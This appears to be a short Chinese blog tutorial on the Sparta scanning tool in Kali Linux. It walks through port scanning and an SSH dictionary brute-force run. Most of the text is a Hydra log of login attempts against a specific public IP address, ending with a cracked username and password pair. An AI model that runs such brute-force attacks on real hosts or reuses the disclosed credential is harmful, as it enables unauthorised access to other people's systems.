Sparta是一个集端口扫描、网络扫描、服务探测以及暴力破解等多项功能于一身的工具,kali中已经预装了该工具,可直接使用。
> 输入目标IP,开始扫描即可探测出开放的端口及服务
> 选中ssh服务,对其进行暴力破解
> 确认IP地址、端口、扫描服务等,上传用户名-密码字典后Run
> 查看扫描log,探测出一个密码被破解
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-07 23:42:58
[DATA] max 16 tasks per 1 server, overall 64 tasks, 2754 login tries (l:27/p:10119.75.217.109), ~2 tries per task
[DATA] attacking service ssh on port 22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[ATTEMPT] target 119.75.217.109 - login "root" - pass "root" - 1 of 2754 [child 0]
[ATTEMPT] target 119.75.217.109 - login "test" - pass "test" - 2 of 2754 [child 1]
[ATTEMPT] target 119.75.217.109 - login "oracle" - pass "oracle" - 3 of 2754 [child 2]
[ATTEMPT] target 119.75.217.109 - login "admin" - pass "admin" - 4 of 2754 [child 3]
[ATTEMPT] target 119.75.217.109 - login "info" - pass "info" - 5 of 2754 [child 4]
…
[ATTEMPT] target 119.75.217.109 - login "ftp" - pass "111111" - 174 of 2883 [child 8]
[ATTEMPT] target 119.75.217.109 - login "support" - pass "111111" - 175 of 2883 [child 12]
[ATTEMPT] target 119.75.217.109 - login "temp" - pass "111111" - 176 of 2883 [child 15]
[ATTEMPT] target 119.75.217.109 - login "nagios" - pass "111111" - 177 of 2883 [child 5]
[ATTEMPT] target 119.75.217.109 - login "user1" - pass "111111" - 178 of 2883 [child 8]
[ATTEMPT] target 119.75.217.109 - login "www" - pass "111111" - 179 of 2883 [child 9]
[ATTEMPT] target 119.75.217.109 - login "test1" - pass "111111" - 180 of 2883 [child 10]
[ATTEMPT] target 119.75.217.109 - login "nobody" - pass "111111" - 181 of 2883 [child 12]
[22][ssh] host: 119.75.217.109 login: oracle password: oracle
[STATUS] attack finished for 119.75.217.109 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-07 23:43:04